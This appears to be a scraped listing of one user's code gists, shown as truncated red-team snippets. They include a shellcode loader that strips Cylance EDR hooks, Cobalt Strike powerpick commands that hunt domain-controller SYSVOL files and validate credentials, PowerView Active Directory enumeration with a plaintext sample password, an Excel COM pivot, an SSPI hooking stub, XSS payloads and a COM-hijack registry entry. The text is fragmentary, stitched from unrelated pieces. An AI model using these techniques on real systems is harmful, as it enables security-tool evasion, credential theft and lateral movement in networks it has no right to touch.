qgrosperrin

#include <iostream>
#include <windows.h>
unsigned char buf[] =
"SHELLCODE_GOES_HERE";
struct syscall_table {
    int osVersion;
};
// Remove Cylance hook from DLL export
void removeCylanceHook(const char *dll, const char *apiName, char code) {
    DWORD old, newOld;

qgrosperrin

# Hunting files on domain controllers:
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".vbs"}
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".exe"}

# Validating password
powerpick Add-Type -AssemblyName System.DirectoryServices.AccountManagement;$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain;$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, '<DC-hostname>');$principalContext.ValidateCredentials('<username>', '<password>')

# Curated output for listing processes (WMI)
powerpick $Password = ConvertTo-SecureString "<password>" -asplaintext -force; $Credential = New-Object -Typename System.Management.Automation.PSCredential -ArgumentList "<DOMAIN\username>",$Password;Get-WMIObject Win32_Process -computername <target-hostname> -Credential $Credential| ?{$_.GetOwner().User -NotLike 'SYSTEM' -and $_.GetOwner().User -NotLike "*SERVICE"} | select ProcessID,Name,@{n

qgrosperrin

# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>

# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword); Get-DomainUser -Credential $Cred

# retrieve all the computer dns host names a GPP password applies to

qgrosperrin

function Invoke-ExcelMacroPivot{
<#
    .AUTHOR
       Matt Nelson (@enigma0x3)
    .SYNOPSIS
       Pivots to a remote host by using an Excel macro and Excel's COM object
    .PARAMETER Target
        Remote host to pivot to
    .PARAMETER RemoteDocumentPath
        Local path on the remote host where the payload resides

qgrosperrin

#define SECURITY_WIN32 //Define First Before Imports.

#include <windows.h>
#include <stdio.h>
#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies


FARPROC fpEncryptMessage; //Pointer To The Original Location
BYTE bSavedByte; //Saved Byte Overwritten by 0xCC -

qgrosperrin

#
# NB : this is not secure
# from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/
# added base64 encoding for simple querystring :)
#

def xor_crypt_string(data, key='awesomepassword', encode=False, decode=False):
    from itertools import izip, cycle
    import base64
    if decode:

qgrosperrin

// Constant for HKEY_LOCAL_MACHINE...
var HKCR = 0x80000000;
/*
Const HKCR = &H80000000 'HKEY_CLASSES_ROOT
Const HKCU = &H80000001 'HKEY_CURRENT_USER
Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE
Const HKU  = &H80000003 'HKEY_USERS
Const HKCC = &H80000005 'HKEY_CURRENT_CONFIG
*/

qgrosperrin

''">
”><script>alert(“X”)</script>
’><script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
' '><script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<script>alert(1)</script>
"><script>alert(1)</script>

qgrosperrin

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"